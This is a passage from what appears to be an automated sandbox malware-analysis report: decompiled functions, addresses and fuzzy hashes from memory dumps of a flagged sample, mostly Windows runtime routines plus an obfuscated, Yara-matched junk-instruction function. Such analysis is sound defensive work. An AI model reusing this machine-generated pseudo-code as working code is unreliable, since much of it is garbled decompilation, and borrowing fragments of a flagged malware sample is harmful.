							__eflags =  *0x1758724 & 0x00000004;
							if(( *0x1758724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1758724; // 0x0
					return E01718DF1(__ebx, 0xc0000374, 0x1755890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                    0x01722076
                    0x01722078
                    0x0172207d
                    0x01722083
                    0x017220a4
                    0x017220aa
                    0x017220ac
                    0x017220b7
                    0x017220ba
                    0x017220bc
                    0x017220c9
                    0x017220c9
                    0x017220d0
                    0x017220d2
                    0x00000000
                    0x017220d2
                    0x017220be
                    0x017220c3
                    0x017220c5
                    0x017220c7
                    0x00000000
                    0x00000000
                    0x017220c7
                    0x017220bc
                    0x017220d4
                    0x01722085
                    0x01722085
                    0x017220a3
                    0x017220a3

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cf1910726637ca8b56b02073b600b20adde14bfeb1c7f5aee75f413350a68117
                    • Instruction ID: d3bafc91e7a75f1dc6830184e6539a8478ebebf5d05c412627758bd77c9d07ec
                    • Opcode Fuzzy Hash: cf1910726637ca8b56b02073b600b20adde14bfeb1c7f5aee75f413350a68117
                    • Instruction Fuzzy Hash: 23F0202A8152A54BDF326B2D20053E1EF92D755120B494885D8901B20EC5B9C883CB22
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A927A Relevance: .0, Instructions: 32COMMON
                    Download Yara Rule
                    C-Code - Quality: 54%
                    			E016A927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L01684620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E016AFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E016A92C6(_t11, _t14);
				}
				return _t11;
			}





                    0x016a9295
                    0x016a9299
                    0x016a929f
                    0x016a92aa
                    0x016a92ad
                    0x016a92ae
                    0x016a92af
                    0x016a92b0
                    0x016a92b4
                    0x016a92bb
                    0x016a92bb
                    0x016a92c5

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                    • Instruction ID: 5e10714edf665f823fcc32ae8a2734f72222a6c1a017659a7ef0c396f8425e9f
                    • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                    • Instruction Fuzzy Hash: 10E02B323405016BE7119E09CC80F47375EDF92724F00407CB9001E242CAE5DC088BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01738D34 Relevance: .0, Instructions: 32COMMON
                    Download Yara Rule
                    C-Code - Quality: 43%
                    			E01738D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x175d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E01687D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E016AB640(E016A9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                    0x01738d34
                    0x01738d43
                    0x01738d4b
                    0x01738d4e
                    0x01738d52
                    0x01738d5c
                    0x01738d6e
                    0x01738d5e
                    0x01738d67
                    0x01738d67
                    0x01738d79
                    0x01738d7a
                    0x01738d7c
                    0x01738d81
                    0x01738d94

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 29ce7400e7c19c123df884024dcb0c2e633575fd5caa98a095f9eb8bf6e09907
                    • Instruction ID: a70f1c559b080a59b58d0756e457371823933d648cf15f7e83a65abcdcadc5c4
                    • Opcode Fuzzy Hash: 29ce7400e7c19c123df884024dcb0c2e633575fd5caa98a095f9eb8bf6e09907
                    • Instruction Fuzzy Hash: F9F0BE70A04608AFDB14EFB8D945A6EB7B4EF58300F508099F905EB281EA34D900CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01738B58 Relevance: .0, Instructions: 31COMMON
                    Download Yara Rule
                    C-Code - Quality: 36%
                    			E01738B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x175d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E01687D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E016AB640(E016A9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                    0x01738b67
                    0x01738b6f
                    0x01738b72
                    0x01738b7d
                    0x01738b8f
                    0x01738b7f
                    0x01738b88
                    0x01738b88
                    0x01738b9a
                    0x01738b9b
                    0x01738b9d
                    0x01738ba2
                    0x01738bb5

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a7eb0293a8eb79d5921bc4d7d4085e09e8c874530762b87156fce3bb6eea62b4
                    • Instruction ID: 5e4f434de4d3ba5431e9e9e9338853c3b702bf4edeedcd3c4a93b067d676e8b5
                    • Opcode Fuzzy Hash: a7eb0293a8eb79d5921bc4d7d4085e09e8c874530762b87156fce3bb6eea62b4
                    • Instruction Fuzzy Hash: 13F0E2B0A00259ABDB14EBA8D906E6EB3B4EF04300F50019DBA01DB381EA30D900C798
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0168746D Relevance: .0, Instructions: 31COMMON
                    Download Yara Rule
                    C-Code - Quality: 88%
                    			E0168746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0167EB70(__ecx, 0x17579a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E016A95D0();
							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                    0x0168746d
                    0x0168746d
                    0x0168746d
                    0x01687471
                    0x01687488
                    0x016cf92d
                    0x0168748e
                    0x01687491
                    0x01687495
                    0x016cf937
                    0x016cf93a
                    0x016cf94e
                    0x016cf953
                    0x016cf956
                    0x016cf956
                    0x01687495
                    0x00000000
                    0x01687488
                    0x01687473
                    0x01687478
                    0x0168747d
                    0x01687481
                    0x00000000
                    0x01687481
                    0x0168747d
                    0x0168747a
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 715ba7b31afeee5a124b4cf10420d3a4cef14d0a16a6511026907f935edfac90
                    • Instruction ID: b4fd398fb3280c83acb87f37babc7b6162c6c5f7b1c875c17b80784c688961c7
                    • Opcode Fuzzy Hash: 715ba7b31afeee5a124b4cf10420d3a4cef14d0a16a6511026907f935edfac90
                    • Instruction Fuzzy Hash: E2F0E934502149AADF02B76CCC40B79BFB2AF04794F644359D895A7251E7659801C799
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01738CD6 Relevance: .0, Instructions: 31COMMON
                    Download Yara Rule
                    C-Code - Quality: 36%
                    			E01738CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x175d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E01687D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E016AB640(E016A9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                    0x01738ce5
                    0x01738ced
                    0x01738cf0
                    0x01738cfb
                    0x01738d0d
                    0x01738cfd
                    0x01738d06
                    0x01738d06
                    0x01738d18
                    0x01738d19
                    0x01738d1b
                    0x01738d20
                    0x01738d33

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3f0823d54639c4889563bc6c3503a64aae19a5f0bcb4e8d39ef66b2b9a8ab12a
                    • Instruction ID: 1e643197c0a9aaafd91494e5cebdacb20247870d6ede57860a24dcdf362c48b1
                    • Opcode Fuzzy Hash: 3f0823d54639c4889563bc6c3503a64aae19a5f0bcb4e8d39ef66b2b9a8ab12a
                    • Instruction Fuzzy Hash: 09F0E270A04209ABCB00EBB8E945E6EB7B4EF58300F600299F911EB281EA34DD00CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01664F2E Relevance: .0, Instructions: 31COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E01664F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E017388F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0168C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1641030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                    0x01664f2e
                    0x01664f34
                    0x01664f38
                    0x016c0b85
                    0x016c0b85
                    0x016c0b89
                    0x016c0b9a
                    0x016c0b9a
                    0x016c0b9f
                    0x00000000
                    0x016c0b9f
                    0x016c0b94
                    0x016c0b98
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016c0b98
                    0x01664f3e
                    0x01664f48
                    0x00000000
                    0x01664f6e
                    0x00000000
                    0x01664f70

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bcd9dc732d0662b06c9354b58b44e63b2c39ac40ac2146f61c52663c61fa1b50
                    • Instruction ID: dafeb0fb50d98abfb68e1aff5036a0ea75d44ab37f9d3f7879622f8d6a9f718d
                    • Opcode Fuzzy Hash: bcd9dc732d0662b06c9354b58b44e63b2c39ac40ac2146f61c52663c61fa1b50
                    • Instruction Fuzzy Hash: ECF0B439526695CFD761DB1CCA44B32B7E4EB10A78F044669E40587A12C735E840C650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0169A44B Relevance: .0, Instructions: 29COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0169A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x1757b9c; // 0x0
				_t15 = __ecx;
				_t16 = L01684620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E016AFA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                    0x0169a44b
                    0x0169a453
                    0x0169a472
                    0x0169a476
                    0x00000000
                    0x0169a493
                    0x0169a47a
                    0x0169a47f
                    0x0169a486
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4226fa98476b062f054e407d745b4279113efe0ccc137e0d0ae07e6ca3276b1d
                    • Instruction ID: 617cd88489708318e358518451e58c16823f6e2ed3023e269483f213b0641420
                    • Opcode Fuzzy Hash: 4226fa98476b062f054e407d745b4279113efe0ccc137e0d0ae07e6ca3276b1d
                    • Instruction Fuzzy Hash: 12E09272A02422ABD3215A58AD00F66739EDBE4A51F0A4039FA04C7214DA68DD02C7E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0166F358 Relevance: .0, Instructions: 28COMMON
                    Download Yara Rule
                    C-Code - Quality: 79%
                    			E0166F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0169F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L01684620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                    0x0166f35d
                    0x0166f361
                    0x0166f367
                    0x0166f372
                    0x0166f38c
                    0x0166f38c
                    0x0166f394

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                    • Instruction ID: a62868efe0002fd7564b8bb8dfe43185166108bcf75a89c7671668c68e6eac8d
                    • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                    • Instruction Fuzzy Hash: 93E0D832A40228FBDB21A6D99D05F5ABFADDB58A60F0101D5FA04E7150D9649D40C2D0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00417DA4 Relevance: .0, Instructions: 27COMMON
                    Download Yara Rule
                    C-Code - Quality: 19%
                    			E00417DA4(void* __eax, void* __ebx, void* __ecx, void* __edx) {
				void* _t21;
				intOrPtr* _t27;
				char _t33;
				signed int _t40;

				L0:
				while(1) {
					L0:
					asm("sti");
					_t27 = __ecx - 1;
					asm("fst dword [esi+0xc]");
					asm("movsb");
					asm("aad 0xf1");
					_t1 = __ebx + 0x27a52988;
					 *_t1 =  *(__ebx + 0x27a52988) & _t40;
					if( *_t1 < 0) {
						break;
					}
					L1:
					asm("stosd");
					asm("salc");
					asm("stc");
					asm("aam 0x89");
					asm("iretd");
					L2:
					asm("aad 0xd4");
					asm("adc al, bl");
					 *_t27 =  *_t27 - 0x68fd1b61;
					asm("clc");
					asm("int3");
					asm("int3");
					asm("cdq");
					asm("loop 0xfffffffd");
					asm("lds eax, [edi]");
					_push(ss);
					asm("popad");
					asm("outsb");
					 *((char*)(_t33 + 0xd1fa36ce)) = _t33;
					asm("sbb [gs:esi], esp");
					 *0x68fd1b61 =  *0x68fd1b61 - 0x68fd1b61;
					asm("sbb ecx, edi");
					asm("repne push cs");
					 *0x5e114725 = 0x5e114725;
					asm("adc bh, bh");
					_pop(_t21);
					asm("iretd");
				}
				L3:
				asm("outsd");
				asm("scasb");
				asm("in eax, 0x36");
				return _t21 + 0xd2;
			}







                    0x00417da4
                    0x00417da4
                    0x00417da4
                    0x00417da4
                    0x00417da5
                    0x00417da6
                    0x00417da9
                    0x00417daa
                    0x00417dac
                    0x00417dac
                    0x00417db2
                    0x00000000
                    0x00000000
                    0x00417d4c
                    0x00417d4c
                    0x00417d4d
                    0x00417d4e
                    0x00417d4f
                    0x00417d51
                    0x00417d52
                    0x00417d57
                    0x00417d59
                    0x00417d5c
                    0x00417d5e
                    0x00417d64
                    0x00417d65
                    0x00417d66
                    0x00417d67
                    0x00417d70
                    0x00417d72
                    0x00417d78
                    0x00417d79
                    0x00417d7b
                    0x00417d81
                    0x00417d84
                    0x00417d88
                    0x00417d8a
                    0x00417d98
                    0x00417da0
                    0x00417da2
                    0x00417da3
                    0x00417da3
                    0x00417db4
                    0x00417db9
                    0x00417dba
                    0x00417dbb
                    0x00417dc9

                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9f71478b1dd33e8165daf0ad5d2e976e4829bb72d9db0870c569fa6390cefc58
                    • Instruction ID: d846c9b1527ffd6f024c9161636dcd27b1cf8746da594e133844b580c99a1eba
                    • Opcode Fuzzy Hash: 9f71478b1dd33e8165daf0ad5d2e976e4829bb72d9db0870c569fa6390cefc58
                    • Instruction Fuzzy Hash: F1D0A7B3D89905974B105CA4F9D00F4F330E966333B20529BED09E33048641C11256CA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0167FF60 Relevance: .0, Instructions: 22COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0167FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x16411a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E017388F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E01680050(_t14);
				}
			}










                    0x0167ff66
                    0x0167ff6b
                    0x00000000
                    0x0167ff8f
                    0x00000000
                    0x0167ff8f

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f6a9bb1b8acd8f1139fa07ac3849fc54631f2108d89aa41d88d418f391b7f19f
                    • Instruction ID: e5582b6f88387eff5238d318d888a9a98c59feb923b8a2b526c06beda73a3681
                    • Opcode Fuzzy Hash: f6a9bb1b8acd8f1139fa07ac3849fc54631f2108d89aa41d88d418f391b7f19f
                    • Instruction Fuzzy Hash: 6FE0DFB020A204DFD735EF5DE840F257B9C9B52621F19859DF0188B602CF29E881C28A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016F41E8 Relevance: .0, Instructions: 21COMMON
                    Download Yara Rule
                    C-Code - Quality: 82%
                    			E016F41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x17408f0);
				_t5 = E016BD08C(__ebx, __edi, __esi);
				if( *0x17587ec == 0) {
					E0167EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x17587ec == 0) {
						 *0x17587f0 = 0x17587ec;
						 *0x17587ec = 0x17587ec;
						 *0x17587e8 = 0x17587e4;
						 *0x17587e4 = 0x17587e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L016F4248();
				}
				return E016BD0D1(_t5);
			}





                    0x016f41e8
                    0x016f41ea
                    0x016f41ef
                    0x016f41fb
                    0x016f4206
                    0x016f420b
                    0x016f4216
                    0x016f421d
                    0x016f4222
                    0x016f422c
                    0x016f4231
                    0x016f4231
                    0x016f4236
                    0x016f423d
                    0x016f423d
                    0x016f4247

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f5bb13f7509f8e5abdd9ef7e1bc34253035e27d1fc4897c69570e49e50473171
                    • Instruction ID: 3dd9f9aee4d3bcc417c92587f176c4e49ed2e707988d693cb9570f36704562fe
                    • Opcode Fuzzy Hash: f5bb13f7509f8e5abdd9ef7e1bc34253035e27d1fc4897c69570e49e50473171
                    • Instruction Fuzzy Hash: B8F01E78860701CFDBB0EFFAA90075876A5F754364F00C96F92008B699CBB844A5CF0A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0171D380 Relevance: .0, Instructions: 21COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0171D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0166E8B0(__ecx, _a4, 0xfff);
					L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                    0x0171d38a
                    0x0171d39b
                    0x0171d3b1
                    0x00000000
                    0x0171d3b6
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                    • Instruction ID: 565da9bb331c706b402526d0da0417bd4083a3cf8e6af492b438ad1bc504408d
                    • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                    • Instruction Fuzzy Hash: A3E0C231280205FBDB326E88CC00F79BB1BDB507A0F204035FE085A690C6759D91DAC8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00407B1D Relevance: .0, Instructions: 21COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: aa4a6c7ea1e483c1f1cb4b69740e5dafc6ab197a628218eb044f99d80a06dbe8
                    • Instruction ID: a8d361c421d06a657629f9e6e5efec2431b215eceeb8d47b9924a6ae19247642
                    • Opcode Fuzzy Hash: aa4a6c7ea1e483c1f1cb4b69740e5dafc6ab197a628218eb044f99d80a06dbe8
                    • Instruction Fuzzy Hash: 04C08CA2A6281A47F529080CAD413F5E398D70A271E0427ABEC08678000087C09301EC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0169A185 Relevance: .0, Instructions: 20COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0169A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x17567e4 >= 0xa) {
					if(_t5 < 0x1756800 || _t5 >= 0x1756900) {
						return L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E01680010(0x17567e0, _t5);
				}
			}





                    0x0169a190
                    0x0169a1a6
                    0x0169a1c2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0169a192
                    0x0169a192
                    0x0169a19f
                    0x0169a19f

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1b4e79d4cf91b3347725721ac0d3e0f9e5e5ee5fa3ed663e7235760990cd1023
                    • Instruction ID: e6d083d2e2e690469197b7465676161530989d1cf21e49328b324350c3d01964
                    • Opcode Fuzzy Hash: 1b4e79d4cf91b3347725721ac0d3e0f9e5e5ee5fa3ed663e7235760990cd1023
                    • Instruction Fuzzy Hash: DED0C7A11640001BCB2D33A09D14B2136ABF780671F744A2CF2060BAA4EAF08CD8C208
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016916E0 Relevance: .0, Instructions: 17COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E016916E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E01691710(0x17567e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L01684620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                    0x016916e8
                    0x016916ef
                    0x016916f3
                    0x016916fe
                    0x00000000
                    0x01691700
                    0x0169170d
                    0x0169170d
                    0x016916f2
                    0x016916f2
                    0x016916f2
                    0x016916f2

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fd73972b2385087c211a6d32e90d09f6f34f5d8421e482408175f0419c32da44
                    • Instruction ID: a94656a9aff1ee6188cecf5d24c6db6f251824ae5283cc8f55243d511286191d
                    • Opcode Fuzzy Hash: fd73972b2385087c211a6d32e90d09f6f34f5d8421e482408175f0419c32da44
                    • Instruction Fuzzy Hash: C3D0A73120011393EF2D5B149C14B14365AEB917A5F38006CF217496C0DFB0CC92F08C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016E53CA Relevance: .0, Instructions: 16COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E016E53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0167EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                    0x016e53ca
                    0x016e53ce
                    0x016e53d9
                    0x016e53de
                    0x016e53e1
